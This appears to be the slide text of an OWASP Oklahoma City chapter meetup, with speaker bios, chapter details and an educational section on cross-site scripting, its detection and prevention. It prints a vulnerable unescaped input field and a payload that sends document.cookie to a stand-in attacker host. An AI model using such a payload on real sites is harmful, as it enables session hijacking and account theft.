Oklahoma City
Welcome! Thanks to our sponsors! OWASP RCB Bank Crossroads Information Security
Joe Sullivan Started in Infosec with a web hosting company in 1999 Started one of the first outsourced support companies for web hosting servers in 2000 Worked for an ecommerce company for 10 years in network security Currently CISO for RCB Bank 1 to 1 Risk Control & Investigations – Owner/Lead Investigator Consulting for Crossroads Information Security SANS Mentor SEC504 Hacker Tools, Techniques, Exploits, and Incident Handling
Jim Thavisouk Jim Thavisouk is currently working at GitLab as their Senior Security Automation Engineer . He has been working closely with automating security in the cloud for the past two years. Before GitLab, he worked with various government agencies, including Department of Defense and Department of Energy, where he focused on vulnerability research against a variety of technologies. Jim also holds a Master's Degree in Computer Science from the University of Tulsa's Cyber Corp program.
Stacy Dunn OWASP Oklahoma City Chapter Leader Information Security Analyst RCB Bank Board Member of Super! BitCon, a local gaming convention. Curator and Founder at Oklahoma Artcade. Super nerd.
Contact Information Joe Sullivan: joe.sullivan@owasp.org Jim Thavisouk: jim.thavisouk@owasp.org Stacy Dunn: stacy.dunn@owasp.org
Oklahoma City Chapter The official page is at: https://www.owasp.org/index.php/Oklahoma_City Twitter: @okcowasp FaceBook YouTube MeetUp: https://www.meetup.com/Oklahoma-City-Chapter-Meetup/ https://owasp.herokuapp.com/ <- Join us on Slack!
OWASP The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions. OWASP is in a unique position to provide impartial, practical information about AppSec to individuals, corporations, universities, government agencies and other organizations worldwide. Operating as a community of like-minded professionals, OWASP issues software tools and knowledge-based documentation on application security.
OWASP Top 10 The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.
OWASP Top 10 2017
Membership Individual Members support OWASP at the $50 USD* level annually. There is also a 2 year membership for $95 USD* and Lifetime membership for $500 USD*. To find out more about Individual Membership, please visit the Individual Member page. Membership is optional Meetings are open to everyone Guests are welcome Memberships help fund our chapter
Meetings Web Application Security Web Application Development Presentations Labs Networking Round Tables Food
The Future Conferences (IWS Coming Up) Speakers Presentations News Challenge Coins Promo Materials Volunteers are welcome!
Speaking of Presentations Cross Site Scripting XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications Better described as a code reflection attack How this works is an attacker crafts a URL with a script in it The script in the URL is sent to the server as input When the user accesses the URL the server reflects back the script contained in the URL The user’s browser processes the script and performs whatever action the script was set to run
Cross Site Scripting Attack Scenario HTML without validation or escaping: (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>"; Attacker modifies the CC parameter to: '><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'. This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.
More Cross Site Scripting Attacks Port scanning your internal network using XSS attacks (https://www.symantec.com/connect/blogs/getting-sassy-xss-part-3-port-scanning) Attacking log viewers and user interfaces with XSS Using the Browser Exploitation Framework (BEEF) to attack browsers https://www.cybrary.it/0p3n/tutorial-xss-exploitation-beef/ Using XSS we can steal cookies, scan networks, hook into browsers and do a lot more Good for getting a foothold on a network
Detecting Cross Site Scripting Attacks This is a noisy attack Generates logs SIEM can detect attacks, but may miss obfuscation techniques IPS can alert to XSS attacks IDS can alert to XSS attacks Web application firewall
Preventing Cross Site Scripting Filter out meta characters from requests – do this one the server side, and not the client side Microsoft offers a free anti-XSS library Using frameworks that automatically escape XSS by design, such as the latest Ruby on Rails, React JS. Learn the limitations of each framework's XSS protection and appropriately handle the use cases which are not covered. Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The OWASP Cheat Sheet 'XSS Prevention' has details on the required data escaping techniques.
Preventing Cross Site Scripting Web application penetration tests regularly Test when changes are implemented to the web application Test when new attacks come out Work with your web application developer on testing and remediation
Discussion What would you like to get out of our meetings? Web Application Security Vulnerability Testing and Remediation Development Security Operations Penetration Testing Incident Response Defending Web Applications